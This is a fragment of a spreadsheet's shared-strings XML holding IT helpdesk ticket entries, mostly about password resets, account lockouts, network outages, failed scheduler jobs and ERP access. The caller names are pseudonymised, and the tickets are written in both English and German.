    <t>expense report - receipt entry screen keeps locking up</t>
  </si>
  <si>
    <t>expense report - receipt entry screen keeps locking up_x000D_
this is causing delays with entering expense reports, especially wherein multiple entries are required.</t>
  </si>
  <si>
    <t>jgxclrzp jzeantui</t>
  </si>
  <si>
    <t>install EU_tool \laeusvjo fvaihgpx</t>
  </si>
  <si>
    <t>access to  m:\live\mw_live(HostName_95)</t>
  </si>
  <si>
    <t>please provide access to below drive to view the drawings_x000D_
m:\live\mw_live</t>
  </si>
  <si>
    <t>jycshmvf uewramti</t>
  </si>
  <si>
    <t>network outage:germany site is down since 4.46amet on 10/26.</t>
  </si>
  <si>
    <t>what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____4.46amet on 10/26._________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _no_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __no____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _na_______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</si>
  <si>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entire location at germany network is down.(germany)</t>
  </si>
  <si>
    <t xml:space="preserve">entire location at germany network is down.
-user mention all the applications are down(erp, outlook, internet, intranet)
</t>
  </si>
  <si>
    <t>mynfoicj riuvxdas</t>
  </si>
  <si>
    <t>HostName_19 : volume c:\  disk consumed is 85% .</t>
  </si>
  <si>
    <t>let's talk - not playing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
refer the below screen shot._x000D_
_x000D_
_x000D_
[cid:image001.png@01d22f8f.98f6b6e0]_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>rjanhbde owfkyjcp</t>
  </si>
  <si>
    <t>HostName_1035(bobj): cpu load on server is high currently utilization is 100% since 3:57am on 10/26/16</t>
  </si>
  <si>
    <t xml:space="preserve">purchasing can not working </t>
  </si>
  <si>
    <t>purchasing input the related the information ,also generated the ordered number 21765757669 .but check the erp me5a no data can check .pls help ,</t>
  </si>
  <si>
    <t>vSMfFXAJ OUAhWpDS</t>
  </si>
  <si>
    <t xml:space="preserve">EU_tool aktualisierung alle 15 min lÃ¤uft nicht   </t>
  </si>
  <si>
    <t>EU_tool aktualisierung alle 15 min lÃ¤uft nicht</t>
  </si>
  <si>
    <t>kfirsmxn dieluyra</t>
  </si>
  <si>
    <t>kindly copy the desktop files of  (user id:  vvgtyrhds) to  (vvkuhtdppg) local folder.</t>
  </si>
  <si>
    <t>gzmafoiv spqjlbar</t>
  </si>
  <si>
    <t>problems with nikulatrhdy</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: koahsriq.wdugqatr@gmail.com
hello,
the account nikulatrhdy is "currently locked out". the user cannot log on the system.
please help.
Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,
ÐµÐ²Ð³ÐµÐ½Ð¸Ñ.
koahsriq wdugqatr,
administrative assistant.
koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;
</t>
  </si>
  <si>
    <t>koahsriq wdugqatr</t>
  </si>
  <si>
    <t>circuit outage: india carrier (company-ap-ind-carrier-891-dmvpn-rtr02) is down since 2.45am et on 10/26.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____2.45am et on 10/26.__________________x000D_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</si>
  <si>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Job_495 failed in job_scheduler at: 10/26/2016 03:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_495 failed in job_scheduler at: 10/26/2016 03:24:00</t>
  </si>
  <si>
    <t>purchasing catalog de-kroschke does not work</t>
  </si>
  <si>
    <t xml:space="preserve">error message when try to open the shop:_x000D_
shop failure_x000D_
you cannot enter the selected shop. _x000D_
reason_x000D_
authentication data is missing or cookie was not accepted by client_x000D_
_x000D_
catalogue has moved to another url see attached mail with the details_x000D_
</t>
  </si>
  <si>
    <t>rhinvtua aquyjfbs</t>
  </si>
  <si>
    <t>kalendereintrÃ¤ge - qdxyifhj zbwtunpy</t>
  </si>
  <si>
    <t>hallo, bitte einmal ansehen. danke.</t>
  </si>
  <si>
    <t>GRP_33</t>
  </si>
  <si>
    <t>qmwhlnev ixtmkwdc</t>
  </si>
  <si>
    <t>need a wireless mouse for my laptop</t>
  </si>
  <si>
    <t>aobrelcs suchytro</t>
  </si>
  <si>
    <t>labeldrucker wk 44567 druckt nicht mehr</t>
  </si>
  <si>
    <t>tigwlquj evynjiar</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 10/26/2016 02:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 10/26/2016 02:10:00</t>
  </si>
  <si>
    <t>windows locked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nmgesubf.wugbalmy@gmail.com
hi,
   following user id (winows) is locked, pl. help.
user id : thrydufg,
</t>
  </si>
  <si>
    <t>nmgesubf wugbalmy</t>
  </si>
  <si>
    <t>daten kann nicht heruntergeladen werden</t>
  </si>
  <si>
    <t xml:space="preserve">daten kann nicht heruntergeladen werden.
die maschine ist im stillstand.
maschine name: wam77035673
datei werden von udo. trhsysba@gmail.com geschikt. 
datei warden in zip und .exe format 
</t>
  </si>
  <si>
    <t>egbziufw syzpgchf</t>
  </si>
  <si>
    <t>unable to login to erp SID_34</t>
  </si>
  <si>
    <t>wfkuvimj gqbmzdkt</t>
  </si>
  <si>
    <t>erp schulung raum :7 kann  beamer nicht verbinden</t>
  </si>
  <si>
    <t>erp schulung raum :7 kann  beamer nicht verbinden_x000D_
_x000D_
reopened as user called in again. please refer to tkt: inplant_868331</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/26/2016 01:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/26/2016 01:36:00</t>
  </si>
  <si>
    <t>unable to scan after resetting password on password_management_tool</t>
  </si>
  <si>
    <t xml:space="preserve">unable to scan after resetting password on password_management_tool.
contact number: 
scan documents are not landing in the scan folder, please check 
</t>
  </si>
  <si>
    <t>vfoyenlw ntpbdeyf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2668 failed in job_scheduler at: 10/26/2016 01:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2668 failed in job_scheduler at: 10/26/2016 01:05:00</t>
  </si>
  <si>
    <t>printer issue</t>
  </si>
  <si>
    <t>"your file could not be printed due to an error on \\HostName_769\tc78 on e05"</t>
  </si>
  <si>
    <t>symieovf tjrwmcfg</t>
  </si>
  <si>
    <t>engineering record issue</t>
  </si>
  <si>
    <t xml:space="preserve">1.) eng records for engineering tool can't usedï¼Œsee attachment for detailed_x000D_
</t>
  </si>
  <si>
    <t>rcpghuqb bxrqamng</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lvxakohq.tsfnhowj@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
business_client soft ware not working in my computer._x000D_
_x000D_
with kind </t>
  </si>
  <si>
    <t>new password not working in vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wdpzfqgi.zndgqcux@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
can you please help me to put new password to my account?_x000D_
_x000D_
yesterday i have changed my password, which worked some 2 hors or so._x000D_
then since that it does not work._x000D_
_x000D_
my suspision is that the new password was the same like in the past (1 year ago or so)._x000D_
_x000D_
i want to log into password_management_tool password manager but without any success._x000D_
_x000D_
[cid:image005.jpg@01d22f4f.c9f93500]_x000D_
_x000D_
[cid:image006.jpg@01d22f4f.c9f93500]_x000D_
_x000D_
s pofgtzdravem / kind </t>
  </si>
  <si>
    <t>wdpzfqgi zndgqcux</t>
  </si>
  <si>
    <t>pls extend mm# 7429784, 7429785 and 7429786 to my user name, thnak you! need to create prs for those mm#.</t>
  </si>
  <si>
    <t>setting up my hand set for emails</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ynsqjehx.kqgrsawl@gmail.com_x000D_
_x000D_
hi it experts,_x000D_
_x000D_
i'd like to continue receive your support for setting up my hand set for emails._x000D_
_x000D_
_x000D_
pls find my below reply._x000D_
_x000D_
a wifi and data plan from your service provider is required to setup email on your mobile device. will use wifi_x000D_
_x000D_
is this device company owned? y/n n_x000D_
_x000D_
is this a replacement of your old device? y/n y_x000D_
_x000D_
if yes, please ensure company data has been removed from the old device (delete exchange setup from settings&gt; mail, contacts, calendar). ok_x000D_
_x000D_
for a personal device, please attach approval form signed by manager to the ticketing_tool ticket. enclsoed_x000D_
_x000D_
please ensure the device is company approved for email setup._x000D_
_x000D_
if it is not a company approved device please contact the gsc._x000D_
_x000D_
for help with exchange setup on a personal device, please contact the device vendor. you may also refer to the faq section for steps._x000D_
_x000D_
has the exchange setup been completed on your device? y/n seems y_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>ynsqjehx kqgrsawl</t>
  </si>
  <si>
    <t>ovlfxsij bcvdlrie</t>
  </si>
  <si>
    <t>close cost center</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bujiesrg.zopcrshl@gmail.com
dear all,
can you help to close the cost center of cnn003456 for 5463789? </t>
  </si>
  <si>
    <t>bujiesrg zopcrshl</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to windows </t>
  </si>
  <si>
    <t>gpevdzct txconyhd</t>
  </si>
  <si>
    <t>credit memo request 7112610434 approva</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
i have messages to process documents in my erp workflow, but i find none._x000D_
please advise._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nuhfwplj ojcwxser</t>
  </si>
  <si>
    <t>engineering_tool upload issue</t>
  </si>
  <si>
    <t xml:space="preserve">from: ufgkybsh ijswtdve 
sent: tuesday, october 25, 2016 8:29 pm
to: nwfodmhc exurcwkm
subject: tgryds fw: engineering_tool upload issue
dear sir/mam,
please find below the screenshot of engineering_tool issue faced during upload.
please help me to resolve the same.
</t>
  </si>
  <si>
    <t>ufgkybsh ijswtdve</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to collaboration_platform </t>
  </si>
  <si>
    <t>ticket update on inplant_872730</t>
  </si>
  <si>
    <t>unable to pull up reports on sales and markhtyeting tab</t>
  </si>
  <si>
    <t>unable to pull up reports on sales and markhtyeting tab in ess</t>
  </si>
  <si>
    <t>trmhfxoz bxofhryg</t>
  </si>
  <si>
    <t>reset users password</t>
  </si>
  <si>
    <t>query regarding logging in to benefits portal</t>
  </si>
  <si>
    <t>anzdtxso trisfkwe</t>
  </si>
  <si>
    <t>inquiry on erp SID_37  bex analysis</t>
  </si>
  <si>
    <t>zolnubvq ehrqifxp</t>
  </si>
  <si>
    <t>pxbqkfgm qexvrmcn</t>
  </si>
  <si>
    <t>interface: fastethernet0/1 on usa-plant-mpls-2811,  is down since 10/25/2016 3:27 pm</t>
  </si>
  <si>
    <t>interface: fastethernet0/1 on usa-plant-mpls-2811,  is down since 10/25/2016 3:27 pm_x000D_
(cc communications 10mbps, circuit id is cccethxakm76356 )</t>
  </si>
  <si>
    <t>spxqmiry zpwgoqju</t>
  </si>
  <si>
    <t>pwvtoemq ugnxwfoe</t>
  </si>
  <si>
    <t xml:space="preserve">please assist thrys hsdbdtt in logging into reporting_tool from crm. see attached screen shot.  he was unable to access using his windows credentials. </t>
  </si>
  <si>
    <t>bitdmacs kumdiywz</t>
  </si>
  <si>
    <t>outlook freezing on mobile broadband</t>
  </si>
  <si>
    <t>rolcgqhx ehndjmlv</t>
  </si>
  <si>
    <t>configure calendar on phone sync with outlook</t>
  </si>
  <si>
    <t>GRP_34</t>
  </si>
  <si>
    <t>grtaoivq dwjvfkqe</t>
  </si>
  <si>
    <t>outlook freezing issue</t>
  </si>
  <si>
    <t>eahkpnbm uptiveok</t>
  </si>
  <si>
    <t>unable to find shortcut on erp</t>
  </si>
  <si>
    <t>xmunoklw bnmswalv</t>
  </si>
  <si>
    <t>hr_tool not working</t>
  </si>
  <si>
    <t xml:space="preserve">the hr_tool app on the sso page opens to a beshryu screen when i open the pay and taxes tab and does nothing. i can not view any pay records._x000D_
</t>
  </si>
  <si>
    <t>bdgklrnj phwmkldy</t>
  </si>
  <si>
    <t>outlook will not open</t>
  </si>
  <si>
    <t xml:space="preserve">i am unable to open outlook. i am getting the error message:_x000D_
"a new guard page for the stack cannot be created"_x000D_
_x000D_
i have tried restarting the computer._x000D_
i have tried starting outlook in safe mode_x000D_
i have tried using the repair function for outlook._x000D_
_x000D_
please advise, </t>
  </si>
  <si>
    <t>dpohqclx wzvihrdy</t>
  </si>
  <si>
    <t>need access to erp kp06789</t>
  </si>
  <si>
    <t xml:space="preserve">need access to kp06789 to enter forecast for it cost centers.  i had requested and received this access at the end of august.  access appears to be gone again.  need by 10/31/16. </t>
  </si>
  <si>
    <t>GRP_35</t>
  </si>
  <si>
    <t>etvendormhd xpslzunb</t>
  </si>
  <si>
    <t>password reset for yscgjexz hxlbvjgf</t>
  </si>
  <si>
    <t>yscgjexz hxlbvjgf</t>
  </si>
  <si>
    <t>node lhqsv4567465 located at usa is down since 10/25/2016 1:47 pm.</t>
  </si>
  <si>
    <t>node lhqsv4567465 located at usa is down since 10/25/2016 1:47 pm.
interface: fc7/20 Â· lhqsv4567465 on sandplant_162 and  sandir02 is down since 10/25/2016 1:47 pm.</t>
  </si>
  <si>
    <t>account lock and need to unlock</t>
  </si>
  <si>
    <t>followup on ticket_no0448851</t>
  </si>
  <si>
    <t>hr_tool payroll sign in</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gvcfhwjy.lyxcorqb@gmail.com_x000D_
_x000D_
hr_tool etime.  unable to see payroll statements.  try to access and receive screen below.  it will not move out of this view._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d22ebc.f17f8040]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>gvcfhwjy lyxcorqb</t>
  </si>
  <si>
    <t>vpn password not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vewdsifl.zjdmftkv@gmail.com_x000D_
_x000D_
pl support to resolve this problem_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vewdsifl zjdmftkv</t>
  </si>
  <si>
    <t xml:space="preserve">not able to enter a project in the lean tracker in collaboration_platform. </t>
  </si>
  <si>
    <t xml:space="preserve">not able to enter a project in the lean tracker in collaboration_platform.  see attached errors.  </t>
  </si>
  <si>
    <t>khvzugxm yqfrcjwl</t>
  </si>
  <si>
    <t>urgent - email delegation.</t>
  </si>
  <si>
    <t xml:space="preserve">hi i had an associate leave on the vsp at the end of september.  i had his outlook in my outlook but now it's gone.  i had received an email that it was now stored on collaboration_platform but i don't see anything when i click on the link.  can i have his email restored through 2016.
</t>
  </si>
  <si>
    <t>nealxjbc owjduxai</t>
  </si>
  <si>
    <t>access to retired employee's collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">Myhrt sthry retired as plant manager in usa. i have replaced him. i request access to his collaboration_platform to copy relevant documents before it is being deleted as per e-mail below.
----------------------------
from: mqjdyizg amhywoqg 
sent: saturday, october 22, 2016 9:00 am
to:  &lt;rozsyfai.zncajubh@gmail.com&gt;
subject: fw: Myhrt sthry's collaboration_platform for business contents will be preserved for 30 days
danieâ€¦you should follow up on this to see if there are any files you may need.
utejhdyd
vice president and general manager
from: no-reply@collaboration_platformonline.com [mailto:no-reply@collaboration_platformonline.com] 
sent: saturday, october 22, 2016 8:56 am
to: mqjdyizg amhywoqg &lt;mqjdyizg.amhywoqg@gmail.com&gt;
subject: Myhrt sthry's collaboration_platform for business contents will be preserved for 30 days
Myhrt sthry's account has been deleted from the active directory. their collaboration_platform for business will be preserved for 30 days. you're the temporary owner of all documents saved to their collaboration_platform for business. if you would like to save content beyond the 30 day retention period, you can copy important documents to another location. you can also contact your administrator to reassign ownership to another collaboration_platform for business owner. after 30 days, Myhrt sthry's collaboration_platform for business will be permanently deleted. go to Myhrt sthry's collaboration_platform for business at 
</t>
  </si>
  <si>
    <t>rozsyfai zncajubh</t>
  </si>
  <si>
    <t>cannot open excel files from \\HostName_1351\departments\hrm pricing\current pricing\fy17 and bkzcfmse naslrwdb can.</t>
  </si>
  <si>
    <t>cannot open excel files from \\HostName_1351\departments\hrm pricing\current pricing\fy17 and bkzcfmse naslrwdb can. files are slow to open or will freeze.</t>
  </si>
  <si>
    <t>hmnuiltc cqpzgvym</t>
  </si>
  <si>
    <t>cannot print to prtqx1270 under my profile on rqxw7404175</t>
  </si>
  <si>
    <t>zuangtpq xpnscghk</t>
  </si>
  <si>
    <t>cannot print from windows with new pc i was just given.</t>
  </si>
  <si>
    <t>bgflmyar xgufkidq</t>
  </si>
  <si>
    <t>intermittent wireless issue on 7350</t>
  </si>
  <si>
    <t>pojhkxua frpxtsca</t>
  </si>
  <si>
    <t>reset passwords for prgewfly ndtfvple using password_management_tool password reset.</t>
  </si>
  <si>
    <t>complete</t>
  </si>
  <si>
    <t>prgewfly ndtfvple</t>
  </si>
  <si>
    <t>reset the password for prgewfly ndtfvple on erp / development / erp</t>
  </si>
  <si>
    <t>completed</t>
  </si>
  <si>
    <t>outlook is slow.</t>
  </si>
  <si>
    <t>axdyfojg nyjlxbsk</t>
  </si>
  <si>
    <t>does the vpn meter the amount of data that can be transferred?</t>
  </si>
  <si>
    <t>recall: incident ticket_no1563995 has been assigned to oncidblt ucewizyd</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oncidblt.ucewizyd@gmail.com
trhsys hrydjs would like to recall the message, "incident ticket_no1563995 has been assigned to oncidblt ucewizyd".
</t>
  </si>
  <si>
    <t>oncidblt ucewizyd</t>
  </si>
  <si>
    <t>account gets locked out.</t>
  </si>
  <si>
    <t xml:space="preserve">account gets locked out._x000D_
id changed from company to company._x000D_
</t>
  </si>
  <si>
    <t>htsnaodb adjtmlzn</t>
  </si>
  <si>
    <t>gpdywmbt pmxfiqkl</t>
  </si>
  <si>
    <t>account locked.</t>
  </si>
  <si>
    <t>bkyphsgq cfyksehu</t>
  </si>
  <si>
    <t xml:space="preserve"> : query : what license does knlrgsiv cqvuexjz has.</t>
  </si>
  <si>
    <t xml:space="preserve">knlrgsiv cqvuexjz has e1 license._x000D_
</t>
  </si>
  <si>
    <t>unable to login to engineering tool</t>
  </si>
  <si>
    <t>ipydfcqo kdxsquzn</t>
  </si>
  <si>
    <t>password change request.</t>
  </si>
  <si>
    <t>mofjyqrh bcyzmkia</t>
  </si>
  <si>
    <t>uacyltoe hxgayczeing - pl ignore</t>
  </si>
  <si>
    <t>GRP_36</t>
  </si>
  <si>
    <t>zscohabw qorvugzf</t>
  </si>
  <si>
    <t>reset the password for xoukpfvr oxvakgcl on erp / production / hcm</t>
  </si>
  <si>
    <t xml:space="preserve">i'm unable to login erp system (engineering tool) SID_34 </t>
  </si>
  <si>
    <t>misplaced login information for ess</t>
  </si>
  <si>
    <t>ustxqmwi lcpfkrwh</t>
  </si>
  <si>
    <t>reset erp SID_34 password for vvtgryhud</t>
  </si>
  <si>
    <t>izhyoqms wecyhadn</t>
  </si>
  <si>
    <t>misplaced username / password.</t>
  </si>
  <si>
    <t>diozrjfn qotabyjn</t>
  </si>
  <si>
    <t>reset passwords for xoukpfvr oxvakgcl using password_management_tool password reset.</t>
  </si>
  <si>
    <t>as per system instruction now i have reset the password, but i'm unable to login erp system SID_34</t>
  </si>
  <si>
    <t>misplaced username / password</t>
  </si>
  <si>
    <t xml:space="preserve">password reset for axhkewnv zpumhlic in citrix </t>
  </si>
  <si>
    <t>rhwsmefo tvphyura</t>
  </si>
  <si>
    <t>unable to use jabra head phone for skype calls</t>
  </si>
  <si>
    <t>dqplrwoy cutpwjie</t>
  </si>
  <si>
    <t xml:space="preserve">removing e-mail reminders from workflow systems of requisition approval </t>
  </si>
  <si>
    <t xml:space="preserve">removing e-mail reminders from workflow systems of requisition approval.  i get repeated e-mail reminders for purchase approval from workflow tasks, but they have been completed long ago.  </t>
  </si>
  <si>
    <t>czwgmjhn rdnyckft</t>
  </si>
  <si>
    <t>collaboration_platform deleted information</t>
  </si>
  <si>
    <t xml:space="preserve">hello,
the user "tgrsyduf" accidentally deleted information from collaboration_platform yesterday. is possible recover this information?
</t>
  </si>
  <si>
    <t>bxeagsmt zrwdgsco</t>
  </si>
  <si>
    <t>collaboration_platform site request</t>
  </si>
  <si>
    <t xml:space="preserve">hello
can you add the users below to as team members to the cybersecurity website 
i should have ownership; users below can have edit access.
qasouhlc xkhsirtd
gzhapcld fdigznbk
ugyothfz ugrmkdhx
raosetuv hmgwrkzb
mfyivqes cpihaxbs
thrdyd dhdtwdd
thrdyakdj yhtdush
jqeczxtn gfjcronyudhakar
akisjtzm uvbmysgcbenezer
qfrntose ivnhumzjalakrisyuhnyrtn
thtudb ghtysui
</t>
  </si>
  <si>
    <t>afkstcev utbnkyop</t>
  </si>
  <si>
    <t>reset the password for dnlhsgyo newducsl on erp / production / erp</t>
  </si>
  <si>
    <t>after setting a new overall password i couldn't access erp. too many fails.sorry for that.</t>
  </si>
  <si>
    <t>dnlhsgyo newducsl</t>
  </si>
  <si>
    <t xml:space="preserve">workplanning from germany plant plant_119 need in bbo1345 the  same erp possibilites </t>
  </si>
  <si>
    <t xml:space="preserve">hello all
my collegue "thryduf" and i "hddwtra" need for the future fully erp acceptance for plant plant_27 too
</t>
  </si>
  <si>
    <t>hsbfiako iylbrwpa</t>
  </si>
  <si>
    <t>probleme mit portal \knlrgsiv cqvuexjz</t>
  </si>
  <si>
    <t>knlrgsiv cqvuexjz</t>
  </si>
  <si>
    <t>unable to login to erp pp5t463</t>
  </si>
  <si>
    <t>password reset needed</t>
  </si>
  <si>
    <t xml:space="preserve">unable to join and setup skype meeting </t>
  </si>
  <si>
    <t>spamkgnx nbixueyw</t>
  </si>
  <si>
    <t>rma 7112619085 workflow in error status</t>
  </si>
  <si>
    <t xml:space="preserve">rma 7112619085 workflow in error status - please advise reason for error and restart workflow. </t>
  </si>
  <si>
    <t>setup rechner ewel8323865 fÃ¼r hr.thrydad (thrydad consulting ) \puxsvfwr cwkjruni</t>
  </si>
  <si>
    <t>puxsvfwr cwkjruni</t>
  </si>
  <si>
    <t xml:space="preserve">employee accounts reactivation etdh thsydaas's </t>
  </si>
  <si>
    <t>etdh thsydaas's 's (employee # 660067598) computer access is terminated. please usa him access back aerp. his last day with company is oct 31.</t>
  </si>
  <si>
    <t>xidbvzsk yrlsnxio</t>
  </si>
  <si>
    <t>recurrent network outage. (every 15 minutes) in penn</t>
  </si>
  <si>
    <t>recurrent network outage. (every 15 minutes).
intranet and internet both are affected.
contact :</t>
  </si>
  <si>
    <t>zcdirjeq azokfsdi</t>
  </si>
  <si>
    <t>engineering tool shows message to all users of south_amerirtca after the logon</t>
  </si>
  <si>
    <t>since monday 10/24/2016, engineering tool users of south_amerirtca reported that engineering tool shows a message after the logon related to the server HostName_1238 (plm server)._x000D_
please see attached message.</t>
  </si>
  <si>
    <t>kbnfxpsy gehxzayq</t>
  </si>
  <si>
    <t>bitte konto ewel8323865 reaktivieren \laptop fÃ¼r ein hr prÃ¼fer \konto fÃ¼r trhfyd sugajadd ist aktiv .bitte um rÃ¼ckruf .</t>
  </si>
  <si>
    <t xml:space="preserve">bitte konto ewel8323865 reaktivieren \laptop fÃ¼r ein hr prÃ¼fer \konto fÃ¼r trhfyd sugajadd ist aktiv .bitte um rÃ¼ckruf .
fyi
von: mfyivqes cpihaxbs 
gesendet: dienstag, 25. oktober 2016 12:54
an: ughzilfm cfibdamq
betreff: re: bitte konto ewel8323865 reaktivieren \laptop fÃ¼r ein hr prÃ¼fer \konto fÃ¼rtrhfyd sugajadd ist aktiv .bitte um rÃ¼ckruf .
hallo ,
bitte ein tickert an help aufmachen, die kÃ¶nnen das machen
grÃ¼ÃŸe
</t>
  </si>
  <si>
    <t>ughzilfm cfibdamq</t>
  </si>
  <si>
    <t>sales manager views in business objects explorer</t>
  </si>
  <si>
    <t>the following sales managers cannot see the sales manager views in business objects explorer
- tcflirwg ojflyruq
- bmudkpie qolrvbip
- thryd athrdyau
- vksfrhdx njhaqket
please check their security and settings with respect to bobj</t>
  </si>
  <si>
    <t>wvdxnkhf jirecvta</t>
  </si>
  <si>
    <t>reset passwords for qnxfegjw rljdhmwb using password_management_tool password reset.</t>
  </si>
  <si>
    <t>qnxfegjw rljdhmwb</t>
  </si>
  <si>
    <t>probleme mit erpgui \tmqfjard qzhgdoua</t>
  </si>
  <si>
    <t>tmqfjard qzhgdoua</t>
  </si>
  <si>
    <t>support fÃ¼r fa.thrydsss-funke \laeusvjo fvaihgpx</t>
  </si>
  <si>
    <t>bildband  tauschen \drucker we68678 \vepxdgot poezmwny</t>
  </si>
  <si>
    <t>vepxdgot poezmwny</t>
  </si>
  <si>
    <t>primary telephone flow down - company EU  - EU plant</t>
  </si>
  <si>
    <t xml:space="preserve">hello,  writes from company EU plant
this mail for inform that we have primary telephone flow down  
all incomig calls and external calls are not running.
i opened a tck to telecom for investigate and for solving the problem.
tck no . #03437236504 
</t>
  </si>
  <si>
    <t>GRP_37</t>
  </si>
  <si>
    <t>cgxhmrvu dbwspjet</t>
  </si>
  <si>
    <t>bobj access not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: btvmxdfc.yfahetsc@gmail.com
hello,
i can now enter bobj but not able to look into any spaces: see below screenshot error when entering any space:
[cid:image001.jpg@01d22eab.12342be0]
[cid:image002.jpg@01d22eab.12342be0]
sales manager company western europe
btvmxdfc.yfahetsc@gmail.com&lt;mailto:btvmxdfc.yfahetsc@gmail.com&gt;
</t>
  </si>
  <si>
    <t>btvmxdfc yfahetsc</t>
  </si>
  <si>
    <t>bobj access for sales managers</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yzugpdco.nsyapewg@gmail.com
team,
my sales managers are not seeing their team view in bobj anymore (global access).
they need it to pull data analysis.
can you please reinstall global access for:
-          tcflirwg ojflyruq
-          bmudkpie qolrvbip
-          thryd adwjfpbreu
-          vksfrhdx njhaqket
</t>
  </si>
  <si>
    <t>yzugpdco nsyapewg</t>
  </si>
  <si>
    <t>skpe addon gone</t>
  </si>
  <si>
    <t xml:space="preserve">skpe addon gone
___________________________
ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
maaryuyten
 hello , need your help. my  skype botton in outlook is gone
 hello , need your help. my  skype botton in outlook is gone
dwfiykeo argtxmvcumar3
 hello, </t>
  </si>
  <si>
    <t>jvxtfhkg heptuizn</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/25/2016 05:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/25/2016 05:07:00</t>
  </si>
  <si>
    <t>hpqc delivers error message: "user is not maintained in the project fy_13 release. please contact hpqc admin"</t>
  </si>
  <si>
    <t xml:space="preserve">my user id: thrydksd'
iÂ´m involved in uat uacyltoe hxgayczeing for ec-ecc and was asked to re-install hpqc client installation kit, what iÂ´ve already done with below links.
when i start hpqc and enter my windows user name and windows password i receive following error message:"user is not maintained in the project fy_13 release. please contact hpqc admin"
</t>
  </si>
  <si>
    <t>GRP_38</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_495 failed in job_scheduler at: 10/25/2016 04:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_495 failed in job_scheduler at: 10/25/2016 04:46:00</t>
  </si>
  <si>
    <t>telefon gigaset m2 ex professional (tel.:) lÃ¤d nicht mehr. anschluss defekt.</t>
  </si>
  <si>
    <t>txkgmwbc qohmgwrp</t>
  </si>
  <si>
    <t>please setup user trhdaa2 back to startpassword at erp</t>
  </si>
  <si>
    <t>pwotudlf wpjlxfke</t>
  </si>
  <si>
    <t>erp - change of new costs not working in cockpit - field mvgr4</t>
  </si>
  <si>
    <t>hello, following problem:_x000D_
due to necessary changes on tool for an received order i tried to update the costs in cockpit, but when saving the quote, it does not work: error message' field mvgr4 cannot be changed, vbapkom 00010 ready for input' any hints how to solve that? i did that on other q1's before and it worked, only new thing is that we have an order running._x000D_
erp data, in case it is necessary: order # 36156763  - q1 # 3116244801. concerning items: 10 (as above), 260, 380, 400</t>
  </si>
  <si>
    <t>nobwzdvh yqjugexl</t>
  </si>
  <si>
    <t>nutzer wk_ksem15462 gesperrt</t>
  </si>
  <si>
    <t>jcgzqndm hukibzqa</t>
  </si>
  <si>
    <t>timerecording terminals in plant germany no communication to the server in fÃ¼rth(bcom server in fÃ¼rth)</t>
  </si>
  <si>
    <t>timerecording terminals in plant germany no communication to the server in fÃ¼rth. they are sending the message "</t>
  </si>
  <si>
    <t>smpijawb eawkpgqf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_485 failed in job_scheduler at: 10/25/2016 02:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_485 failed in job_scheduler at: 10/25/2016 02:33:00</t>
  </si>
  <si>
